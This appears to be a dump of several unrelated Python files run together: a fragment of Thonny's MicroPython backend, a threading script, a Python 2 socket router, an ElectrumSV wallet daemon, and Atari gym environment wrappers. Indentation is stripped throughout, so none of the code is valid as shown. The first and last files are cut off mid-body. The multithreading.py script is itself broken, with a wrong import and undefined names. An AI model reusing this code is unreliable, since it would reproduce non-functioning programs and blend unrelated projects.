__thonny_result = __thonny_getmount("/").label
finally:
del __thonny_getmount
except ImportError:
__thonny_result = None
except OSError:
__thonny_result = None
"""
),
cleanup="del __thonny_result",
)
if result is not None:
return result
if self._welcome_text is None:
return None
"""
# following is not reliable and probably not needed
markers_by_name = {"PYBFLASH": {"pyb"}, "CIRCUITPY": {"circuitpython"}}
for name in markers_by_name:
for marker in markers_by_name[name]:
if marker.lower() in self._welcome_text.lower():
return name
"""
return None
def _get_flash_prefix(self):
if not self._supports_directories():
return ""
elif (
"LoBo" in self._welcome_text
or "WiPy with ESP32" in self._welcome_text
or "PYBLITE" in self._welcome_text
or "PYBv" in self._welcome_text
or "PYBOARD" in self._welcome_text.upper()
):
return "/flash/"
else:
return "/"
def _get_fs_mount(self):
label = self._get_fs_mount_label()
if label is None:
return None
else:
candidates = find_volumes_by_name(
self._get_fs_mount_label(),
# querying A can be very slow
skip_letters="A",
)
if len(candidates) == 0:
raise RuntimeError("Could not find volume " + self._get_fs_mount_label())
elif len(candidates) > 1:
raise RuntimeError("Found several possible mount points: %s" % candidates)
else:
return candidates[0]
def _get_fs_info(self, path):
result = self._evaluate(
dedent(
"""{
"total" : __thonny_total,
"used" : __thonny_used,
"free": __thonny_free,
"sizes": __thonny_sizes
}"""
),
prelude=dedent(
"""
try:
from os import statvfs as __thonny_statvfs
__thonny_stat = __thonny_statvfs(%r)
__thonny_total = __thonny_stat[2] * __thonny_stat[0]
__thonny_free = __thonny_stat[3] * __thonny_stat[0]
__thonny_used = __thonny_total - __thonny_free
__thonny_sizes = None
del __thonny_statvfs
del __thonny_stat
except ImportError:
import os as __thonny_os
__thonny_sizes = [__thonny_os.size(name) for name in __thonny_os.listdir()]
__thonny_used = None
__thonny_total = None
__thonny_free = None
del __thonny_os
"""
)
% path,
cleanup=dedent(
"""
del __thonny_total
del __thonny_free
del __thonny_used
del __thonny_sizes
"""
),
)
if result["sizes"] is not None:
if self._connected_to_microbit():
comment = "Assuming around 30 kB of storage space for user files."
else:
comment = "Don't know the size of storage space on this device."
files_total_size = sum(result["sizes"])
# TODO: compute number of used blocks
if files_total_size > 0:
comment += "\n\n" + "At least %s of it is used by %d file(s)." % (
sizeof_fmt(files_total_size),
len(result["sizes"]),
)
result["comment"] = comment
del result["sizes"]
return result
def _get_microbit_file_sizes(self):
return self._evaluate(
"{name : __thonny_os.size(name) for name in __thonny_os.listdir()}",
prelude="import os as __thonny_os",
cleanup="del __thonny_os",
)
def _get_dirs_child_data_generic(self, paths):
return self._evaluate(
"__thonny_result",
prelude=dedent(
"""
import os as __thonny_os
# Init all vars, so that they can be deleted
# even if the loop makes no iterations
__thonny_result = {}
__thonny_path = None
__thonny_st = None
__thonny_child_names = None
__thonny_children = None
__thonny_name = None
__thonny_real_path = None
__thonny_full = None
for __thonny_path in %(paths)r:
__thonny_real_path = __thonny_path or '/'
try:
__thonny_child_names = __thonny_os.listdir(__thonny_real_path)
except OSError:
# probably deleted directory
__thonny_children = None
else:
__thonny_children = {}
for __thonny_name in __thonny_child_names:
if __thonny_name.startswith('.') or __thonny_name == "System Volume Information":
continue
__thonny_full = (__thonny_real_path + '/' + __thonny_name).replace("//", "/")
try:
__thonny_st = __thonny_os.stat(__thonny_full)
if __thonny_st[0] & 0o170000 == 0o040000:
# directory
__thonny_children[__thonny_name] = {"kind" : "dir", "size" : None}
else:
__thonny_children[__thonny_name] = {"kind" : "file", "size" :__thonny_st[6]}
# converting from 2000-01-01 epoch to Unix epoch
__thonny_children[__thonny_name]["time"] = max(__thonny_st[8], __thonny_st[9]) + 946684800
except OverflowError:
# Probably "System Volume Information" in trinket
# https://github.com/thonny/thonny/issues/923
pass
__thonny_result[__thonny_path] = __thonny_children
"""
)
% {"paths": paths},
cleanup=dedent(
"""
del __thonny_os
del __thonny_st
del __thonny_children
del __thonny_name
del __thonny_path
del __thonny_full
del __thonny_result
del __thonny_real_path
"""
),
)
def _check_for_connection_errors(self):
self._connection._check_for_error()
def _on_connection_closed(self, error=None):
message = "Connection lost"
if error:
message += " (" + str(error) + ")"
self._send_output("\n" + message + "\n", "stderr")
self._send_output("\n" + "Use Stop/Restart to reconnect." + "\n", "stderr")
sys.exit(EXPECTED_TERMINATION_CODE)
def _show_error(self, msg):
self._send_output(msg + "\n", "stderr")
def should_hexlify(self, path):
if "binascii" not in self._builtin_modules:
return False
for ext in (".py", ".txt", ".csv"):
if path.lower().endswith(ext):
return False
return True
class ProtocolError(Exception):
def __init__(self, message, captured):
Exception.__init__(self, message)
self.message = message
self.captured = captured
class ExecutionError(Exception):
pass
def _report_internal_error():
print("PROBLEM WITH THONNY'S BACK-END:\n", file=sys.stderr)
traceback.print_exc()
def ends_overlap(left, right):
"""Returns whether the left ends with one of the non-empty prefixes of the right"""
for i in range(1, min(len(left), len(right)) + 1):
if left.endswith(right[:i]):
return True
return False
def parse_api_information(file_path):
with tokenize.open(file_path) as fp:
source = fp.read()
tree = ast.parse(source)
defs = {}
# TODO: read also docstrings ?
for toplevel_item in tree.body:
if isinstance(toplevel_item, ast.ClassDef):
class_name = toplevel_item.name
member_names = []
for item in toplevel_item.body:
if isinstance(item, ast.FunctionDef):
member_names.append(item.name)
elif isinstance(item, ast.Assign):
# TODO: check Python 3.4
"TODO: item.targets[0].id"
defs[class_name] = member_names
return defs
def linux_dirname_basename(path):
if path == "/":
return ("/", "")
if "/" not in path: # micro:bit
return "", path
path = path.rstrip("/")
dir_, file_ = path.rsplit("/", maxsplit=1)
if dir_ == "":
dir_ = "/"
return dir_, file_
def to_remote_path(path):
return path.replace("\\", "/")
class ReadOnlyFilesystemError(RuntimeError):
pass
if __name__ == "__main__":
THONNY_USER_DIR = os.environ["THONNY_USER_DIR"]
logger = logging.getLogger("thonny.micropython.backend")
logger.propagate = False
logFormatter = logging.Formatter("%(levelname)s: %(message)s")
file_handler = logging.FileHandler(
os.path.join(THONNY_USER_DIR, "micropython-backend.log"), encoding="UTF-8", mode="w"
)
file_handler.setFormatter(logFormatter)
file_handler.setLevel(logging.INFO)
logger.addHandler(file_handler)
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--clean", type=lambda s: True if s == "True" else False)
parser.add_argument("--port", type=str)
parser.add_argument("--url", type=str)
parser.add_argument("--password", type=str)
parser.add_argument("--api_stubs_path", type=str)
parser.add_argument("--min_write_delay", type=float, default=0.01)
args = parser.parse_args()
port = None if args.port == "None" else args.port
try:
if port is None:
# remain busy
while True:
time.sleep(1000)
elif port == "webrepl":
from thonny.plugins.micropython.webrepl_connection import WebReplConnection
connection = WebReplConnection(args.url, args.password, args.min_write_delay)
else:
from thonny.plugins.micropython.serial_connection import SerialConnection
from thonny.plugins.micropython.serial_connection import DifficultSerialConnection
connection = SerialConnection(port, BAUDRATE)
# connection = DifficultSerialConnection(port, BAUDRATE)
vm = MicroPythonBackend(connection, clean=args.clean, api_stubs_path=args.api_stubs_path)
except ConnectionFailedException as e:
text = "\n" + str(e) + "\n"
msg = BackendEvent(event_type="ProgramOutput", stream_name="stderr", data=text)
sys.stdout.write(serialize_message(msg) + "\n")
sys.stdout.flush()
|
multithreading.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jul 1 00:21:21 2018
@author: arthur
"""
from Queue import Queue
import numpy as np
from threading import thread
#
#
def encoder():
leitura = random.randint(0,50)
print("Encoder: " + str(leitura) + " km/h")
def ultrassom():
for i in range(0,50):
leitura_ultra = random.randint(0,50)
leitura = np.median(leitura_ultra)
print("Ultrassom: " + str(leitura) + " m")
def gps():
for i in range(0,50):
leitura_ultra = random.randint(0,50)
leitura = np.median(leitura_ultra)
print("GPS lat: " + str(leitura) + " ")
print("GPS long: " + str(leitura) + " ")
# Threaded function for queue processing.
def crawl(q, result):
while not q.empty():
work = q.get() #fetch new work from the Queue
try:
data = urlopen(work[1]).read()
logging.info("Requested..." + work[1])
result[work[0]] = data #Store data back at correct index
except:
logging.error('Error with URL check!')
result[work[0]] = {}
#signal to the queue that task has been processed
q.task_done()
return True
leitura_ultra = []
#set up the queue to hold all the urls
q = Queue(maxsize=0)
# Use many threads (50 max, or one for each url)
num_theads = min(50, len(urls))
#Populating Queue with tasks
results = [{} for x in urls];
#load up the queue with the urls to fetch and the index for each job (as a tuple):
for i in range(len(urls)):
#need the index and the url in each queue item.
q.put((i,urls[i]))
for i in range(num_theads):
logging.debug('Starting thread ', i)
worker = Thread(target=crawl, args=(q,results))
worker.setDaemon(True) #setting threads as "daemon" allows main program to
#exit eventually even if these dont finish
#correctly.
worker.start()
#now we wait until the queue has been processed
q.join()
logging.info('All tasks completed.')
|
thread_old.py
|
import pdb
pdb.set_trace()
import threading
def myfunc(i):
print "sleeping 5 sec from thread %d" % i
#for i in range(10):
t = threading.Thread(target=myfunc, args=(1,))
t.start()
|
route.py
|
#!/usr/bin/env python
"""Route messages between clients. \
Tested with Python 2.7.6"""
##### Imports #####
from threading import Thread
from sys import argv
from socket import (
socket, AF_INET,
SOCK_STREAM, SOL_SOCKET,
SHUT_RDWR,
SO_REUSEADDR, gethostname,
)
from argparse import (
ArgumentParser,
ArgumentDefaultsHelpFormatter
)
####################
#### (Magic) Defaults ####
ACCESS_ADDR = ''
PORT = 23456
BUFFSIZE = 2048
SIZE = 255
VERSION = '1.0'
##########################
####### Argument Parser #######
def parseargs(args):
verbose = "verbose output"
pars = ArgumentParser(
formatter_class=ArgumentDefaultsHelpFormatter,
fromfile_prefix_chars='<',
description=__doc__
)
pars.add_argument(
'PORT',
nargs = '?',
default=PORT,
help='The port number for the server',
type=int
)
pars.add_argument(
'-v','--verbose',
help=verbose,
action='store_true'
)
pars.add_argument(
'--version',
action='version',
version='%(prog)s ' + VERSION
)
pars.add_argument(
'--size',
type=int,
metavar='N',
choices=range(3,1023),
default=SIZE,
help="The maximum number N of clients to \
accept (2 < N < 1024).\
Note: one client is reserved."
)
pars.add_argument(
'--buffer', '-b',
type=int,
metavar='M',
choices=range(2048,10240),
default=BUFFSIZE,
help="The maximum size M of messages to \
accept (2048 < M < 10240)"
)
return pars.parse_args(args)
####################################################
# Create a server socket
def serversocket(port):
s = socket(AF_INET, SOCK_STREAM)
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
s.bind((ACCESS_ADDR,port))
return s
# This class handles all routing
class ConnectionHandler:
# Constructor
def __init__(self, port = PORT, size = SIZE, verbose=False):
self.server = serversocket(port)
# Active connections
self.connections = {}
# Available addresses
self.free = {i for i in range(1, size)}
# Max addresses available
self.size = size
# Verbose output
self.verbose = verbose
### Boiler plate ###
def __repr__(self):
return str(self.connections)
def __str__(self):
return str(self.connections)
def __len__(self):
return len(connections)
def __contains__(self, key):
return (key in self.connections)
def __getitem__(self, key):
return self.connections[key]
def __setitem__(self, key, value):
if key > 0 and key < self.size:
self.connections[key] = value
else:
raise KeyError
def __delitem__(self, key):
# Pop the connection and mark address available
self.free.add(key);
c = self.connections.pop(key, None)
if c is not None:
# Connection exists
if self.verbose:
print "Removed address " + str(key) + ": " + str(c)
try:
# Close the client
c[0].shutdown(SHUT_RDWR)
c[0].close()
except:
# Client is already closed
pass
def __missing__(self, key):
return None
# Broadcast a teardown and close the server
def __del__(self):
self.teardown()
self.server.close()
#####################
# Parse message into target and string
def __parse_msg__(self, msg):
mtuple = msg.split(":", 1)
try:
mtuple[0] = int(mtuple[0])
#mtuple[1] = mtuple[1].strip()
except ValueError:
return -1
if mtuple[0] not in self and mtuple[0] != self.size:
mtuple[1] = -1
return mtuple
# Add a new client if possible
def add(self, client):
try:
# Get connection address
n = self.free.pop()
except KeyError:
# No addresses available
client[0].send("Sorry. The router is full :(\r\n")
client[0].close()
if self.verbose:
print "Error: connection rejected"
return
# Send address and add connection
client[0].send(str(n)+"\r\n")
self[n] = client
if self.verbose:
print "Client " + str(n) + " added: " + str(client)
# Route the client requests
t = Thread(target=self.route, args=(n,))
t.start()
# Receive and route messages from client at
# address n.
# Should be threaded to avoid blocking
def route(self, n):
part = ""
while 1:
try:
msgs = self.connections[n][0].recv(BUFFSIZE)
if not msgs:
break
msgs = msgs.split("\n")
msgs[0] = part + msgs[0]
if len(msgs) > 1:
part = msgs[-1]
msgs = msgs[0:-1]
for msg in msgs:
mtuple = self.__parse_msg__(msg)
# invalid message format
if mtuple == -1:
msg = "Error: invalid message \"" + msg + "\""
self.send(n, msg)
# address not found
elif mtuple[1] == -1:
msg = "Error: " + str(mtuple[0]) + " not found"
self.send(n, msg)
# No Errors
else:
if mtuple[1].strip() == '0':
# Teardown request
if mtuple[0] == self.size:
self.teardown()
return
# Close request
else:
del self[mtuple[0]]
if mtuple[0] == n: return
else:
# Broadcast request
if mtuple[0] == self.size:
self.broadcast(msg.strip())
# Message request
else:
msg = ": ".join([str(n), mtuple[1]])
self.send(mtuple[0], msg)
except:
# gracefully clean up upon any exceptions
break
del self[n]
# Handle broadcast requests
def broadcast(self, msg):
if self.verbose: print "Broadcasting " + msg
for key, connection in self.connections.iteritems():
if self.verbose: print "Sending to " + str(connection)
connection[0].send(msg + "\r\n")
# Send msg to client at address to
def send(self, to, msg):
if self.verbose:
print "Sending to " + str(to) + ": " + msg
self[to][0].send(msg + "\r\n")
# Perform teardowns
def teardown(self):
if self.verbose: print "Tearing down\r\n"
for key in self.connections:
del self[key]
# Start listening and accepting clients
# callable instance
def __call__(self):
self.server.listen(5)
while 1:
try:
client = self.server.accept()
self.add(client)
except:
# oops
break
del self
def main():
# parse args
args = parseargs(argv[1:])
# Create connection handler
handle = ConnectionHandler(port=args.PORT,
size=args.size,
verbose=args.verbose)
# Accept connections
handle()
if __name__ == '__main__':
main()
|
daemon.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import ast
import base64
from typing import Any, cast, Dict, Optional, Tuple, Union
import os
import time
import jsonrpclib
from .restapi import AiohttpServer
from .app_state import app_state
from .commands import known_commands, Commands
from .exchange_rate import FxTask
from .jsonrpc import VerifyingJSONRPCServer
from .logs import logs
from .network import Network
from .simple_config import SimpleConfig
from .storage import WalletStorage
from .util import json_decode, DaemonThread, to_string, random_integer, get_wallet_name_from_path
from .version import PACKAGE_VERSION
from .wallet import Wallet
from .restapi_endpoints import DefaultEndpoints
logger = logs.get_logger("daemon")
def get_lockfile(config: SimpleConfig) -> str:
return os.path.join(config.path, 'daemon')
def remove_lockfile(lockfile: str) -> None:
logger.debug("removing lockfile")
try:
os.unlink(lockfile)
except OSError:
pass
def get_fd_or_server(config: SimpleConfig) -> Tuple[Optional[int], Optional[jsonrpclib.Server]]:
'''Tries to create the lockfile, using O_EXCL to
prevent races. If it succeeds it returns the FD.
Otherwise try and connect to the server specified in the lockfile.
If this succeeds, the server is returned. Otherwise remove the
lockfile and try again.'''
lockfile = get_lockfile(config)
while True:
try:
return os.open(lockfile, os.O_CREAT | os.O_EXCL | os.O_WRONLY, 0o644), None
except OSError:
pass
server = get_server(config)
if server is not None:
return None, server
# Couldn't connect; remove lockfile and try again.
remove_lockfile(lockfile)
def get_server(config: SimpleConfig) -> Optional[jsonrpclib.Server]:
lockfile_path = get_lockfile(config)
while True:
create_time = None
server_url = None
try:
with open(lockfile_path) as f:
(host, port), create_time = ast.literal_eval(f.read())
rpc_user, rpc_password = get_rpc_credentials(config)
if rpc_password == '':
# authentication disabled
server_url = 'http://%s:%d' % (host, port)
else:
server_url = 'http://%s:%s@%s:%d' % (
rpc_user, rpc_password, host, port)
server = jsonrpclib.Server(server_url)
# Test daemon is running
server.ping()
return server
except ConnectionRefusedError:
logger.warning("get_server could not connect to the rpc server, is it running?")
except SyntaxError:
if os.path.getsize(lockfile_path):
logger.exception("RPC server lockfile exists, but is invalid")
else:
# Our caller 'get_fd_or_server' has created the empty file before we check.
logger.warning("get_server could not connect to the rpc server, is it running?")
except FileNotFoundError as e:
if lockfile_path == e.filename:
logger.info("attempt to connect to the RPC server failed")
else:
logger.exception("attempt to connect to the RPC server failed")
except Exception:
logger.exception("attempt to connect to the RPC server failed")
if not create_time or create_time < time.time() - 1.0:
return None
# Sleep a bit and try again; it might have just been started
time.sleep(1.0)
def get_rpc_credentials(config: SimpleConfig, is_restapi=False) \
-> Tuple[Optional[str], Optional[str]]:
rpc_user = config.get('rpcuser', None)
rpc_password = config.get('rpcpassword', None)
if rpc_user is None or rpc_password is None:
rpc_user = 'user'
nbits = 128
pw_int = random_integer(nbits)
pw_b64 = base64.b64encode(
pw_int.to_bytes(nbits // 8, 'big'), b'-_')
rpc_password = to_string(pw_b64, 'ascii')
config.set_key('rpcuser', rpc_user)
config.set_key('rpcpassword', rpc_password, save=True)
elif rpc_password == '' and not is_restapi:
logger.warning('No password set for RPC API. Access is therefore granted to any users.')
elif rpc_password == '' and is_restapi:
logger.warning('No password set for REST API. Access is therefore granted to any users.')
return rpc_user, rpc_password
class Daemon(DaemonThread):
rest_server: Optional[AiohttpServer]
cmd_runner: Commands
def __init__(self, fd, is_gui: bool) -> None:
super().__init__('daemon')
app_state.daemon = self
config = app_state.config
self.config = config
if config.get('offline'):
self.network = None
self.fx_task = None
app_state.read_headers()
else:
self.network = Network()
app_state.fx = FxTask(app_state.config, self.network)
self.fx_task = app_state.async_.spawn(app_state.fx.refresh_loop)
self.wallets: Dict[str, Wallet] = {}
# RPC API - (synchronous)
self.init_server(config, fd, is_gui)
# self.init_thread_watcher()
self.is_gui = is_gui
# REST API - (asynchronous)
self.rest_server = None
if app_state.config.get("restapi"):
self.init_restapi_server(config, fd)
self.configure_restapi_server()
def configure_restapi_server(self):
self.default_api = DefaultEndpoints()
self.rest_server.register_routes(self.default_api)
def init_restapi_server(self, config: SimpleConfig, fd) -> None:
host = config.get("rpchost", '127.0.0.1')
if os.environ.get('RESTAPI_HOST'):
host = os.environ.get('RESTAPI_HOST')
restapi_port = int(config.get('restapi_port', 9999))
if os.environ.get('RESTAPI_PORT'):
restapi_port = int(cast(str, os.environ.get('RESTAPI_PORT')))
username, password = get_rpc_credentials(config, is_restapi=True)
self.rest_server = AiohttpServer(host=host, port=restapi_port, username=username,
password=password)
def init_server(self, config: SimpleConfig, fd, is_gui: bool) -> None:
host = config.get('rpchost', '127.0.0.1')
port = config.get('rpcport', 8888)
rpc_user, rpc_password = get_rpc_credentials(config)
try:
server = VerifyingJSONRPCServer((host, port), logRequests=False,
rpc_user=rpc_user, rpc_password=rpc_password)
except Exception as e:
logger.error('Warning: cannot initialize RPC server on host %s %s', host, e)
self.server = None
os.close(fd)
return
os.write(fd, bytes(repr((server.socket.getsockname(), time.time())), 'utf8'))
os.close(fd)
self.server = server
server.timeout = 0.1
server.register_function(self.ping, 'ping')
server.register_function(self.run_gui, 'gui')
server.register_function(self.run_daemon, 'daemon')
server.register_function(self.run_cmdline, 'run_cmdline')
def init_thread_watcher(self) -> None:
import threading
import sys
import traceback
def _watcher():
while True:
for th in threading.enumerate():
th_text = str(th)
# if "GUI" not in th_text:
# continue
print(th)
traceback.print_stack(sys._current_frames()[th.ident])
print()
time.sleep(5.0)
t = threading.Thread(target=_watcher)
t.setDaemon(True)
t.start()
def ping(self) -> bool:
return True
def run_daemon(self, config_options: dict) -> Union[bool, str, Dict[str, Any]]:
config = SimpleConfig(config_options)
sub = config.get('subcommand')
assert sub in [None, 'start', 'stop', 'status', 'load_wallet', 'close_wallet']
response: Union[bool, str, Dict[str, Any]]
if sub in [None, 'start']:
response = "Daemon already running"
elif sub == 'load_wallet':
path = config.get_cmdline_wallet_filepath()
wallet = self.load_wallet(path) if path is not None else None
self.cmd_runner._wallet = wallet
response = True
elif sub == 'close_wallet':
cmdline_wallet_filepath = config.get_cmdline_wallet_filepath()
assert cmdline_wallet_filepath is not None
path = WalletStorage.canonical_path(cmdline_wallet_filepath)
if path in self.wallets:
self.stop_wallet_at_path(path)
response = True
else:
response = False
elif sub == 'status':
if self.network:
response = self.network.status()
response.update({
'fee_per_kb': self.config.fee_per_kb(),
'path': self.config.path,
'version': PACKAGE_VERSION,
'wallets': {k: w.is_synchronized() for k, w in self.wallets.items()},
})
else:
response = "Daemon offline"
elif sub == 'stop':
self.stop()
response = "Daemon stopped"
return response
def run_gui(self, config_options: dict) -> str:
config = SimpleConfig(config_options)
if hasattr(app_state, 'windows'):
path = config.get_cmdline_wallet_filepath()
app_state.app.new_window(path, config.get('url'))
return "ok"
return "error: ElectrumSV is running in daemon mode; stop the daemon first."
def load_wallet(self, wallet_filepath: str) -> Optional[Wallet]:
# wizard will be launched if we return
if wallet_filepath in self.wallets:
wallet = self.wallets[wallet_filepath]
return wallet
if not WalletStorage.files_are_matched_by_path(wallet_filepath):
return None
storage = WalletStorage(wallet_filepath)
if storage.requires_split():
storage.close()
logger.debug("Wallet '%s' requires an split", wallet_filepath)
return None
if storage.requires_upgrade():
storage.close()
logger.debug("Wallet '%s' requires an upgrade", wallet_filepath)
return None
wallet = Wallet(storage)
self.start_wallet(wallet)
return wallet
def get_wallet(self, path: str) -> Optional[Wallet]:
wallet_filepath = WalletStorage.canonical_path(path)
return self.wallets.get(wallet_filepath)
def start_wallet(self, wallet: Wallet) -> None:
# We expect the storage path to be exact, including the database extension. So it should
# match the canonical path used elsewhere.
self.wallets[wallet.get_storage_path()] = wallet
wallet.start(self.network)
def stop_wallet_at_path(self, path: str) -> None:
wallet_filepath = WalletStorage.canonical_path(path)
# Issue #659 wallet may already be stopped.
if wallet_filepath in self.wallets:
wallet = self.wallets.pop(wallet_filepath)
wallet.stop()
def stop_wallets(self):
for path in list(self.wallets.keys()):
self.stop_wallet_at_path(path)
def run_cmdline(self, config_options: dict) -> Any:
password = config_options.get('password')
new_password = config_options.get('new_password')
config = SimpleConfig(config_options)
cmdname = config.get('cmd')
cmd = known_commands[cmdname]
if cmd.requires_wallet:
cmdline_wallet_filepath = config.get_cmdline_wallet_filepath()
assert cmdline_wallet_filepath is not None
wallet_path = WalletStorage.canonical_path(cmdline_wallet_filepath)
wallet = self.wallets.get(wallet_path)
if wallet is None:
return {'error': 'Wallet "%s" is not loaded. Use "electrum-sv daemon load_wallet"'
% get_wallet_name_from_path(wallet_path)}
else:
wallet = None
# arguments passed to function
args = [config.get(x) for x in cmd.params]
# decode json arguments
args = [json_decode(i) for i in args]
# options
kwargs = {}
for x in cmd.options:
kwargs[x] = (config_options.get(x) if x in ['password', 'new_password']
else config.get(x))
cmd_runner = Commands(config, wallet, self.network)
func = getattr(cmd_runner, cmd.name)
result = func(*args, **kwargs)
return result
def on_stop(self):
if self.rest_server and self.rest_server.is_alive:
app_state.async_.spawn_and_wait(self.rest_server.stop)
self.logger.debug("stopped.")
def launch_restapi(self):
if not self.rest_server.is_alive:
self._restapi_future = app_state.async_.spawn(self.rest_server.launcher)
self.rest_server.is_alive = True
def run(self) -> None:
if app_state.config.get("restapi"):
self.launch_restapi()
while self.is_running():
self.server.handle_request() if self.server else time.sleep(0.1)
logger.warning("no longer running")
if self.network:
logger.warning("wait for network shutdown")
assert self.fx_task is not None, "fx task should be valid if network is"
self.fx_task.cancel()
app_state.async_.spawn_and_wait(self.network.shutdown_wait)
self.on_stop()
def stop(self) -> None:
logger.warning("stopping")
super().stop()
self.stop_wallets()
remove_lockfile(get_lockfile(self.config))
|
atari_wrappers.py
|
import gym
import numpy as np
from collections import deque
from PIL import Image
from multiprocessing import Process, Pipe
# atari_wrappers.py
class NoopResetEnv(gym.Wrapper):
def __init__(self, env, noop_max=30):
"""Sample initial states by taking random number of no-ops on reset.
No-op is assumed to be action 0.
"""
gym.Wrapper.__init__(self, env)
self.noop_max = noop_max
self.override_num_noops = None
assert env.unwrapped.get_action_meanings()[0] == 'NOOP'
def _reset(self):
""" Do no-op action for a number of steps in [1, noop_max]."""
self.env.reset()
if self.override_num_noops is not None:
noops = self.override_num_noops
else:
noops = self.unwrapped.np_random.randint(1, self.noop_max + 1) #pylint: disable=E1101
assert noops > 0
obs = None
for _ in range(noops):
obs, _, done, _ = self.env.step(0)
if done:
obs = self.env.reset()
return obs
class FireResetEnv(gym.Wrapper):
def __init__(self, env):
"""Take action on reset for environments that are fixed until firing."""
gym.Wrapper.__init__(self, env)
assert env.unwrapped.get_action_meanings()[1] == 'FIRE'
assert len(env.unwrapped.get_action_meanings()) >= 3
def _reset(self):
self.env.reset()
obs, _, done, _ = self.env.step(1)
if done:
self.env.reset()
obs, _, done, _ = self.env.step(2)
if done:
self.env.reset()
return obs
class EpisodicLifeEnv(gym.Wrapper):
def __init__(self, env):
"""Make end-of-life == end-of-episode, but only reset on true game over.
Done by DeepMind for the DQN and co. since it helps value estimation.
"""
gym.Wrapper.__init__(self, env)
self.lives = 0
self.was_real_done = True
def _step(self, action):
obs, reward, done, info = self.env.step(action)
self.was_real_done = done
# check current lives, make loss of life terminal,
# then update lives to handle bonus lives
lives = self.env.unwrapped.ale.lives()
if lives < self.lives and lives > 0:
# for Qbert somtimes we stay in lives == 0 condtion for a few frames
# so its important to keep lives > 0, so that we only reset once
# the environment advertises done.
done = True
self.lives = lives
return obs, reward, done, info
def _reset(self):
"""Reset only when lives are exhausted.
This way all states are still reachable even though lives are episodic,
and the learner need not know about any of this behind-the-scenes.
"""
if self.was_real_done:
obs = self.env.reset()
else:
# no-op step to advance from terminal/lost life state
obs, _, _, _ = self.env.step(0)
self.lives = self.env.unwrapped.ale.lives()
return obs
class MaxAndSkipEnv(gym.Wrapper):
def __init__(self, env, skip=4):
"""Return only every `skip`-th frame"""
gym.Wrapper.__init__(self, env)
# most recent raw observations (for max pooling across time steps)
self._obs_buffer = deque(maxlen=2)
self._skip = skip
def _step(self, action):
"""Repeat action, sum reward, and max over last observations."""
total_reward = 0.0
done = None
for _ in range(self._skip):
obs, reward, done, info = self.env.step(action)
self._obs_buffer.append(obs)
total_reward += reward
if done:
break
max_frame = np.max(np.stack(self._obs_buffer), axis=0)
return max_frame, total_reward, done, info
def _reset(self):
"""Clear past frame buffer and init. to first obs. from inner env."""
self._obs_buffer.clear()
obs = self.env.reset()
self._obs_buffer.append(obs)
return obs
class ClipRewardEnv(gym.RewardWrapper):
def _reward(self, reward):
"""Bin reward to {+1, 0, -1} by its sign."""
return np.sign(reward)
class WarpFrame(gym.ObservationWrapper):
def __init__(self, env):
"""Warp frames to 84x84 as done in the Nature paper and later work."""
gym.ObservationWrapper.__init__(self, env)
self.res = 84
self.observation_space = gym.spaces.Box(low=0, high=255, shape=(self.res, self.res, 1), dtype='uint8')
def _observation(self, obs):
frame = np.dot(obs.astype('float32'), np.array([0.299, 0.587, 0.114], 'float32'))
frame = np.array(Image.fromarray(frame).resize((self.res, self.res),
resample=Image.BILINEAR), dtype=np.uint8)
return frame.reshape((self.res, self.res, 1))
class FrameStack(gym.Wrapper):
def __init__(self, env, k):
"""Buffer observations and stack across channels (last axis)."""
gym.Wrapper.__init__(self, env)
self.k = k
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
assert shp[2] == 1 # can only stack 1-channel frames
self.observation_space = gym.spaces.Box(low=0, high=255, shape=(shp[0], shp[1], k), dtype='uint8')
def _reset(self):
"""Clear buffer and re-fill by duplicating the first observation."""
ob = self.env.reset()
for _ in range(self.k): self.frames.append(ob)
return self._observation()
def _step(self, action):
ob, reward, done, info = self.env.step(action)
self.frames.append(ob)
return self._observation(), reward, done, info
def _observation(self):
assert len(self.frames) == self.k
return np.concatenate(self.frames, axis=2)
def wrap_deepmind(env, episode_life=True, clip_rewards=True):
"""Configure environment for DeepMind-style Atari.
Note: this does not include frame stacking!"""
assert 'NoFrameskip' in env.spec.id # required for DeepMind-style skip
if episode_life:
env = EpisodicLifeEnv(env)
env = NoopResetEnv(env, noop_max=30)
env = MaxAndSkipEnv(env, skip=4)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
env = WarpFrame(env)
if clip_rewards:
env = ClipRewardEnv(env)
return env
# envs.py
def make_env(env_id, seed, rank):
def _thunk():
env = gym.make(env_id)
env.seed(seed + rank)
env = wrap_deepmind(env)
env = WrapPyTorch(env)
return env
return _thunk
class WrapPyTorch(gym.ObservationWrapper):
def __init__(self, env=None):
super(WrapPyTorch, self).__init__(env)
self.observation_space = gym.spaces.Box(0.0, 1.0, [1, 84, 84], dtype='float32')
def _observation(self, observation):
return observation.transpose(2, 0, 1)
# vecenv.py
class VecEnv(object):
"""
Vectorized environment base class
"""
def step(self, vac):
"""
Apply sequence of actions to sequence of environments
actions -> (observations, rewards, news)
where 'news' is a boolean vector indicating whether each element is new.
"""
raise NotImplementedError
def reset(self):
"""
Reset all environments
"""
raise NotImplementedError
def close(self):
pass
# subproc_vec_env.py
def worker(remote, env_fn_wrapper):
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
